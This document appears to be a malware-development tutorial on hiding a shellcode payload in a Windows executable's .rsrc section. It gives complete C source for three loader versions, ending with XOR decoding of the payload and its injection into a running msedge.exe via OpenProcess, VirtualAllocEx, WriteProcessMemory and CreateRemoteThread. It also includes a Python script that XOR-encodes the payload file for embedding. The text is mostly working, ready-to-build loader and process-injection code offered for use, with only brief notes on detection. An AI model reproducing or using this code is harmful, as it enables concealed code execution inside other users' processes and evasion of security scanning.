
# Rsrc Placement Payload

## 1 - First Version Of Code&#x20;

This code copies the payload from <mark style="color:purple;">**.rsrc**</mark> into TmpBuffer, a buffer allocated in memory with <mark style="color:red;">**"HeapAlloc"**</mark>.

```c
#include <Windows.h>
#include <stdio.h>
#include "resource.h"

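/*
 * Loader, version 1: locate the RCDATA resource IDR_RCDATA1, copy it into a
 * process-heap buffer, report the addresses, and free the copy again.
 * Nothing is executed.
 *
 * Returns 0 on success, -1 if any Win32 step fails (the Win32 error code is
 * printed alongside the failure).
 */
int main(void) {

    HRSRC   hRsrc        = NULL;
    HGLOBAL hGlobal      = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = 0;   /* integer, so 0 rather than the pointer constant NULL */

    /* NULL module handle = the executable itself. */
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        /* GetLastError() is a DWORD (unsigned long): %lu, not %d. */
        printf("[!] There is a problem in hRsrc: %lu\n", GetLastError());
        return -1;
    }

    /* LoadResource hands back a handle into the already-mapped image; there
       is nothing to release for it, nor for LockResource below. */
    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[!] There is a problem in LoadResource: %lu\n", GetLastError());
        return -1;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[!] There is a problem in LockResource: %lu\n", GetLastError());
        return -1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[!] There is a problem in sPayloadSize: %lu\n", GetLastError());
        return -1;
    }

    /* Writable scratch copy on the process heap; the resource mapping
       itself is read-only. */
    PVOID TmpBuffer = HeapAlloc(GetProcessHeap(), 0, sPayloadSize);
    if (TmpBuffer == NULL) {
        /* HeapAlloc does not call SetLastError on failure, so the code
           printed here may be stale. */
        printf("[!] There is a problem in HeapAlloc: %lu\n", GetLastError());
        return -1;
    }

    memcpy(TmpBuffer, pPayloadAddr, sPayloadSize);
    printf("[+] Suc To Move Payload From pPayloadAddr to TmpBuffer\n");

    printf("[+] TmpBuffer Addr : 0x%p\n", TmpBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);   /* SIZE_T needs %zu; %d is undefined behaviour */

    /* Release the heap copy and check the result instead of assuming it worked. */
    if (!HeapFree(GetProcessHeap(), 0, TmpBuffer)) {
        printf("[!] There is a problem in HeapFree: %lu\n", GetLastError());
        return -1;
    }

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}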

```

## 2 - Second Version Of Code

We can do a couple more things here:

{% stepper %}
{% step %}

### Xor Shell Code&#x20;

We can XOR the shellcode instead of running it directly as stored.
{% endstep %}

{% step %}

### We Can Use VirtualAlloc Function

This function allocates memory that can be executed.
{% endstep %}
{% endstepper %}

This code copies the payload from <mark style="color:purple;">**.rsrc**</mark> into execBuffer, a buffer allocated in memory with <mark style="color:red;">**"VirtualAlloc"**</mark>, and it can execute it :)

```c

#include <Windows.h>
#include <stdio.h>
#include "resource.h"

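/*
 * Apply a repeating-key XOR to HexArray in place.
 *
 * XOR with a short repeating key is obfuscation, not encryption: the key is
 * compiled into the binary next to the data, and the same function both
 * encodes and decodes (XOR is its own inverse).
 *
 * HexArray     - buffer transformed in place; must be writable (the .rsrc
 *                mapping is not, so callers copy it first)
 * HexArraySize - number of bytes in HexArray
 * Keys         - key bytes, cycled with i % KeysSize
 * KeysSize     - number of key bytes
 *
 * A NULL buffer, a NULL key or KeysSize == 0 leaves HexArray untouched
 * instead of faulting or dividing by zero.
 */
void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    if (HexArray == NULL || Keys == NULL || KeysSize == 0) {
        return;
    }
    /* SIZE_T index: the original `int i` was compared signed-vs-unsigned
       against HexArraySize and could not index past INT_MAX. */
    for (SIZE_T i = 0; i < HexArraySize; i++) {
        HexArray[i] ^= Keys[i % KeysSize];
    }
}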

/*
 * Loader, version 2: copy the XOR-ed RCDATA resource into a VirtualAlloc'd
 * RWX buffer, decode it there, dump the bytes, and call into the buffer.
 *
 * Returns 0 on success, 1 if any resource/allocation step fails. Nothing
 * after the indirect call runs unless the payload returns to the caller.
 */
int main() {

    /* 12-byte repeating XOR key, compiled into the binary next to the data
       it covers: obfuscation, not encryption. */
    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    HRSRC   hRsrc = NULL;
    HGLOBAL hGlobal = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = NULL;   /* NOTE(review): SIZE_T is an integer; 0 is the right initializer, not the pointer constant NULL */

    /* NULL module handle = the executable itself. */
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return 1;
    }

    /* Handle into the already-mapped image; nothing to release. */
    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return 1;
    }

    /* pPayloadAddr points into the read-only resource mapping; it is only
       ever read from below, never written. */
    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return 1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return 1;
    }

    /* Private committed memory that is readable, writable and executable at
       once. RWX private regions that are written and then executed are a
       standard heuristic for memory scanners and EDR telemetry. */
    PVOID execBuffer = VirtualAlloc(NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execBuffer == NULL) {
        printf("[-] Failed to allocate memory for execBuffer.\n");
        return 1;
    }

    /* Writable copy; the XOR is applied here, not on the read-only mapping. */
    memcpy(execBuffer, pPayloadAddr, sPayloadSize);

    DecodeXorEncryption((PBYTE)execBuffer, sPayloadSize, keys, sizeof(keys));

    /* Debug dump of the decoded bytes to stdout.
       NOTE(review): `int i` is compared against a SIZE_T (signed/unsigned mismatch). */
    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", ((unsigned char*)execBuffer)[i]);
    }
    printf("\n");


    printf("[+] execBuffer Addr : 0x%p\n", execBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    /* Treat the buffer as a function and call it. Control only comes back if
       the payload returns; if it terminates the process or never returns,
       the VirtualFree and the prompt below are skipped. */
    printf("[#] Running Payload...\n");
    ((void(*)())execBuffer)();

    /* Return value is not checked. */
    VirtualFree(execBuffer, 0, MEM_RELEASE);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

```

## Let's Explain the Code :)

#### 1 - Xor Shell Code

```c
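/*
 * Apply a repeating-key XOR to HexArray in place.
 *
 * XOR with a short repeating key is obfuscation, not encryption: the key is
 * compiled into the binary next to the data, and the same function both
 * encodes and decodes (XOR is its own inverse).
 *
 * HexArray     - buffer transformed in place; must be writable (the .rsrc
 *                mapping is not, so callers copy it first)
 * HexArraySize - number of bytes in HexArray
 * Keys         - key bytes, cycled with i % KeysSize
 * KeysSize     - number of key bytes
 *
 * A NULL buffer, a NULL key or KeysSize == 0 leaves HexArray untouched
 * instead of faulting or dividing by zero.
 */
void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    if (HexArray == NULL || Keys == NULL || KeysSize == 0) {
        return;
    }
    /* SIZE_T index: the original `int i` was compared signed-vs-unsigned
       against HexArraySize and could not index past INT_MAX. */
    for (SIZE_T i = 0; i < HexArraySize; i++) {
        HexArray[i] ^= Keys[i % KeysSize];
    }
}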
```

#### 2 - These Are the XOR Keys Used on the Shellcode:

```c
/* The 12-byte repeating XOR key. It is compiled into the binary next to the
   payload it covers, so anyone holding the binary holds both: this hides the
   bytes from a plain scan of the file, it does not encrypt them. */
unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };
```

#### 3 - Python Code To XOR the calc.ico File Before Putting It in the Malware

```python
# Define the encryption keys: the same 12 bytes the C loader holds in its
# `keys[]` array, so what this script XORs, DecodeXorEncryption undoes.
keys = [0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7f, 0x71, 0x2c]

# XOR encryption/decryption function (XOR is its own inverse, so one
# function serves both directions)
def xor_with_keys(data, keys):
    """Return ``data`` XOR-ed byte-wise with ``keys`` repeated cyclically."""
    key_len = len(keys)
    out = bytearray(len(data))
    for idx, byte in enumerate(data):
        out[idx] = byte ^ keys[idx % key_len]
    return bytes(out)

# Path of the resource file that is XOR-ed in place (the script targets
# calc.ico, not fav.ico)
file_path = "calc.ico"

try:
    # Read the whole file, transform it, then overwrite it. The original
    # bytes are not kept, so run this once per file: a second run XORs
    # the data straight back.
    with open(file_path, "rb") as handle:
        payload = handle.read()

    encoded = xor_with_keys(payload, keys)

    with open(file_path, "wb") as handle:
        handle.write(encoded)

except FileNotFoundError:
    print(f"Error: {file_path} not found!")
except IOError as e:
    print(f"An I/O error occurred: {e}")
else:
    print(f"Successfully applied XOR and updated {file_path}!")

```

## Now We Can Add Proc Injection :)

```c
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "resource.h"

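/*
 * Apply a repeating-key XOR to HexArray in place.
 *
 * XOR with a short repeating key is obfuscation, not encryption: the key is
 * compiled into the binary next to the data, and the same function both
 * encodes and decodes (XOR is its own inverse).
 *
 * HexArray     - buffer transformed in place; must be writable (the .rsrc
 *                mapping is not, so callers copy it first)
 * HexArraySize - number of bytes in HexArray
 * Keys         - key bytes, cycled with i % KeysSize
 * KeysSize     - number of key bytes
 *
 * A NULL buffer, a NULL key or KeysSize == 0 leaves HexArray untouched
 * instead of faulting or dividing by zero.
 */
void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    if (HexArray == NULL || Keys == NULL || KeysSize == 0) {
        return;
    }
    /* SIZE_T index: the original `int i` was compared signed-vs-unsigned
       against HexArraySize and could not index past INT_MAX. */
    for (SIZE_T i = 0; i < HexArraySize; i++) {
        HexArray[i] ^= Keys[i % KeysSize];
    }
}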

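/*
 * Copy the embedded RCDATA resource IDR_RCDATA1 into a freshly allocated,
 * writable heap buffer.
 *
 * resourceSize - out: receives the resource length in bytes. It is zeroed
 *                on entry and only set on success, so a caller never sees a
 *                size for a buffer it did not get.
 *
 * Returns the heap copy, or NULL on failure (a message has already been
 * printed). Ownership passes to the caller, who must free() it. The
 * resource mapping itself (LoadResource/LockResource) needs no release.
 */
PBYTE GetResourceData(SIZE_T* resourceSize) {
    if (resourceSize == NULL) {
        return NULL;
    }
    *resourceSize = 0;

    /* NULL module handle = the executable itself. */
    HRSRC hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return NULL;
    }

    HGLOBAL hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return NULL;
    }

    PVOID pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return NULL;
    }

    /* SizeofResource returns a DWORD; 0 means failure. */
    DWORD dwSize = SizeofResource(NULL, hRsrc);
    if (dwSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return NULL;
    }

    /* The locked resource lives in the image's read-only section, so the
       bytes are copied into heap memory before anything modifies them. */
    PBYTE pWritablePayload = (PBYTE)malloc(dwSize);
    if (pWritablePayload == NULL) {
        printf("[-] Failed to allocate memory for writable payload.\n");
        return NULL;
    }

    memcpy(pWritablePayload, pPayloadAddr, dwSize);
    *resourceSize = dwSize;
    return pWritablePayload;
}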

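/*
 * Return the PID of the first running process whose image name equals
 * ProcName (case-insensitive), 0 if none matches, or -1 on an API failure.
 *
 * ProcName is a narrow UTF-8 string; it is widened because the entry name
 * is compared with lstrcmpiW. The return type stays int for the existing
 * callers (they test for 0 / -1) even though th32ProcessID is a DWORD.
 *
 * NOTE(review): this presumably relies on a UNICODE build, where
 * PROCESSENTRY32 resolves to the wide variant and szExeFile is WCHAR[];
 * in an ANSI build the lstrcmpiW comparison would not compile.
 */
int FindTarget(const char* ProcName) {
    if (ProcName == NULL) {
        return -1;
    }

    /* Widen first so a bad name is reported before a snapshot is taken.
       -1 converts the terminator too, so the result is NUL-terminated;
       the call returns 0 if the name does not fit in MAX_PATH. */
    WCHAR wideProcName[MAX_PATH];
    if (MultiByteToWideChar(CP_UTF8, 0, ProcName, -1, wideProcName, MAX_PATH) == 0) {
        printf("[!] There is a problem in MultiByteToWideChar: %lu\n", GetLastError());
        return -1;
    }

    /* th32ProcessID is ignored for TH32CS_SNAPPROCESS; pass 0 explicitly. */
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE) {
        printf("[!] There is a problem in hSnapShot: %lu\n", GetLastError());
        return -1;
    }

    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(pe32);

    if (!Process32First(hSnapShot, &pe32)) {
        printf("[!] There is a problem in Process32First: %lu\n", GetLastError());
        CloseHandle(hSnapShot);
        return -1;
    }

    int pid = 0;
    /* do/while: the entry filled in by Process32First must be compared as
       well; a loop that starts with Process32Next skips the first process
       in the snapshot. */
    do {
        if (lstrcmpiW(wideProcName, pe32.szExeFile) == 0) {
            pid = (int)pe32.th32ProcessID;
            break;
        }
    } while (Process32Next(hSnapShot, &pe32));

    CloseHandle(hSnapShot);
    return pid;
}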

/*
 * Loader, version 3: decode the resource in a malloc'd copy, then place it
 * in a running "msedge.exe" and start a thread on it with CreateRemoteThread.
 *
 * Returns 0 on success and 1 on any failure; each failure path releases
 * what was acquired before it (heap copy, process handle, remote region).
 *
 * Detection notes: OpenProcess on another process, VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE, WriteProcessMemory into that region and
 * CreateRemoteThread with a start address inside it is the textbook remote
 * injection sequence. Sysmon records the last step as Event ID 8, and EDR
 * products correlate the whole chain.
 */
int main() {
    /* 12-byte repeating XOR key, compiled into the binary: obfuscation only. */
    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    /* Writable heap copy of the resource; we own it and free it on every exit path. */
    SIZE_T sPayloadSize = 0;
    PBYTE pWritablePayload = GetResourceData(&sPayloadSize);
    if (pWritablePayload == NULL) {
        return 1;
    }

    printf("------------------\n");
    printf("pWritablePayload : %p\n", pWritablePayload);
    printf("------------------\n");


    /* Decode in place; this works because the copy is heap memory, not the
       read-only resource mapping. */
    DecodeXorEncryption(pWritablePayload, sPayloadSize, keys, sizeof(keys));

    /* Debug dump of the decoded payload to stdout.
       NOTE(review): `int i` is compared against a SIZE_T (signed/unsigned mismatch). */
    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", pWritablePayload[i]);
    }
    printf("\n");

    printf("[+] PayloadAddr: 0x%p\n", pWritablePayload);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    printf("[#]--------Start Process Injection--------[#]\n");

    /* Target name is hard-coded. FindTarget returns int although
       th32ProcessID is a DWORD; the 0 / -1 checks rely on that narrowing. */
    int targetPID = 0;
    targetPID = FindTarget("msedge.exe");
    printf("targetPID : %d\n", targetPID);
    if (targetPID == -1 || targetPID == 0) {
        printf("[-] Failed to find the target process.\n");
        free(pWritablePayload);
        return 1;
    }

    // Open the target process
    /* PROCESS_ALL_ACCESS asks for every right on the target; the handle is
       the first artefact an EDR sees for this chain. */
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (hProcess == NULL) {
        printf("[-] Failed to open the target process. Error: %lu\n", GetLastError());
        free(pWritablePayload);
        return 1;
    }

    // Allocate memory in the target process
    /* RWX private memory inside another process. */
    LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == NULL) {
        printf("[-] Failed to allocate memory in the target process. Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    // Write the payload to the target process
    /* lpNumberOfBytesWritten is NULL, so a short write would go unnoticed. */
    if (!WriteProcessMemory(hProcess, remoteBuffer, pWritablePayload, sPayloadSize, NULL)) {
        printf("[-] Failed to write to the target process memory. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Created remoteBuffer successfully : 0x%p\n", remoteBuffer);

    // Create a remote thread in the target process
    /* Thread start address = start of the freshly written remote buffer. */
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    if (hThread == NULL) {
        printf("[-] Failed to create remote thread in the target process. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Remote thread created successfully.\n");

    // Wait for the remote thread to finish
    /* INFINITE: if the remote thread never exits this blocks forever and the
       cleanup below never runs. The return value is not checked. */
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    /* Return values of the release calls are not checked. */
    CloseHandle(hThread);
    VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    free(pWritablePayload);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}
```

#### **Why We Used `malloc` First**

1. **Understanding the Resource Memory:**
   * When you load a resource using `LoadResource` and `LockResource`, the data is stored in a **read-only memory section** of your program. This is because resources (like your payload) are embedded in the executable file and mapped into memory as part of the program image when it is loaded.
   * Attempting to **modify** this memory (e.g., by applying XOR decryption) will result in an **Access Violation** (`0xC0000005`) because the memory is protected and not writable.
2. **The Problem with Directly Using `pPayloadAddr`:**
   * `pPayloadAddr` points to the memory location of the resource, which is **read-only**.
   * If you try to modify this memory directly (e.g., `DecodeXorEncryption(pPayloadAddr, ...)`), the program will crash because you're trying to write to a protected memory region.
3. **Why `malloc` is Necessary:**
   * `malloc` allocates a **new block of memory** in the **heap**, which is **writable** by default.
   * By copying the resource data (`pPayloadAddr`) into this newly allocated memory (`pWritablePayload`), you create a **writable copy** of the payload.
   * Now, you can safely modify this copy (e.g., apply XOR decryption) without causing an Access Violation.

